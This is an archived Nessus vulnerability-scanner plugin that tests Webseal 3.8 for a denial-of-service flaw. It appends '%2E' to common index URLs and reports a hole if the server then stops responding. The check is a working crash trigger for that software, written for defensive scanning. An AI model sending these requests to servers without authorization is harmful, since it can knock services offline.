home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / webseal_DoS.nasl

< prev

next >

Wrap

Text File  |  2005-03-31  |  3KB  |  107 lines

---

1. # This script was written by Michel Arboi <arboi@alussinan.org>
2. #
3. # GPL
4. #
5. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
6. #      Erik Anderson <eanders@carmichaelsecurity.com>
7. #      Added BugtraqID and CAN
8. #
9. # References:
10. # Date:  11 Dec 2001 09:22:50 -0000
11. # From: "Matthew Lane" <MatthewL@Janusassociates.com>
12. # To: bugtraq@securityfocus.com
13. # Subject: Webseal 3.8
14. #
15. # Affected:
16. # Webseal 3.8
17. #
18. # *unconfirmed*
19.  
20. if(description)
21. {
22.  script_id(11089);
23.  script_bugtraq_id(3685);
24.  script_version ("$Revision: 1.11 $");
25.  script_cve_id("CAN-2001-1191");
26.  
27.  name["english"] = "Webseal denial of service";
28.  name["francais"] = "DΘni de service contre Webseal";
29.  script_name(english:name["english"],
30.           francais:name["francais"]);
31.  
32.  desc["english"] = "
33. The remote web server dies when an URL ending with %2E is requested.
34.  
35. A cracker may use this flaw to make your server crash continually.
36.  
37. Solution : upgrade your server or firewall it.
38. Risk factor : High"; 
39.  
40.  
41.  desc["francais"] = "
42. Le serveur web distant meurt quand on demande une URL qui se termine
43. par %2E
44.  
45. Un pirate pourrait utiliser cette faille pour tuer rΘguliΦrement
46. votre serveur.
47.  
48. Solution : mettez votre logiciel α jour ou protΘgez-le
49.  
50. Facteur de risque : ElevΘ";
51.  
52.  script_description(english:desc["english"],
53.               francais:desc["francais"]);
54.             
55.  
56.  summary["english"] = "Request ending with %2E kills WebSeal"; 
57.  summary["francais"] = "Une requΩte qui se termine par %2E tue WebSeal";
58.  script_summary(english:summary["english"],
59.           francais:summary["francais"]);
60.  
61.  script_category(ACT_DENIAL);
62.  
63.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
64.            francais:"Ce script est Copyright (C) 2002 Michel Arboi");
65.  
66.  family["english"] = "Denial of Service";
67.  family["francais"] = "DΘni de service";
68.  script_family(english:family["english"], francais:family["francais"]);
69.  script_dependencie("find_service.nes", "httpver.nasl");
70.  script_require_ports("Services/www", 80);
71.  exit(0);
72. }
73.  
74. #
75.  
76. include("http_func.inc");
77.  
78. port = get_http_port(default:80);
79.  
80. if (! get_port_state(port)) exit(0);
81. if (! can_host_asp(port:port)) exit(0);
82.  
83. if (http_is_dead(port: port)) exit(0);
84.  
85. soc = http_open_socket(port);
86. if (! soc) exit(0);
87.  
88. url[0] = "/index.html";
89. url[1] = "/index.htm";
90. url[2] = "/index.asp";
91. url[3] = "/";
92.  
93. for (i=0; i<4;i=i+1)
94. {
95.  req = http_get(port: port, item: string(url[i], "%2E"));
96.  send(socket: soc, data: req);
97.  r = http_recv(socket: soc);
98.  http_close_socket(soc);
99.  
100.  soc = http_open_socket(port);
101.  if(!soc) break;
102. }
103. # We must close the socket, VNC limits the number of parallel connections
104. if (soc) http_close_socket(soc);
105.  
106. if (http_is_dead(port: port)) { security_hole(port); }
107.